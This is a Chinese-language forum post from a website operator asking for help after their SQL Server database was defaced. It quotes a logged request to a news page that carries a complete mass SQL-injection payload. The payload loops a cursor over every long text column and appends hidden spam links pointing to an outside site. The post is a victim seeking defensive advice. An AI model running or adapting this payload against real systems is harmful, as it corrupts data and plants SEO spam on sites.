数据库遭攻击,求救!!1
网站采用。net三层架构,sql操作都有采用防止sql注入式攻击,这两天发现数据库中某个表的字段莫名出现一连串html代码,查询服务器应用程序日志发现如下警告,这是我们的一个新闻展示页,对方用如此方式是如何攻击的,我该怎么做,才能阻止他攻击啊?
http://www.xxxxxxxx.com/Manage/WebManage/OrderNewDetail.aspx?ContentID=532;
declare @c cursor;
declare @d varchar(4000);
set @c=cursor for select
'update ['+TABLE_NAME+'] set ['+COLUMN_NAME+']
=['+COLUMN_NAME+']+case ABS(CHECKSUM(NewId()))%7 when 0 then ''''+char(60)+
''div style="display:none"''+char(62)+''abortion clinics in ny ''+char(60)+
''a href="http:''+char(47)+char(47)+''astrobix.com''+char(47)+''astroblog''+
char(47)+''page''+char(47)+''how-to-end-pregnancy.aspx"''+char(62)+case ABS(CHECKSUM(NewId()))%3 when 0 then ''
pregnancy nine weeks'' when 1 then ''abortion pills over the counter'' else ''are abortions painful'' END
+char(60)+char(47)+''a''+char(62)+'' carly fiorina abortion''+char(60)+char(47)+''div''+char(62)+'''' else '''' end'
FROM sysindexes AS i
SELECT TOP 1 * FROM sysindexes
INNER JOIN sysobjects AS o ON i.id=o.id
INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME
WHERE(indid=0 or indid=1) and DATA_TYPE
like '%varchar' and(CHARACTER_MAXIMUM_LENGTH=-1 or CHARACTER_MAXIMUM_LENGTH=2147483647);
open @c;
fetch next from @c into @d;
while @@FETCH_STATUS=0
begin exec (@d);
fetch next from @c into @d;
end;
close @c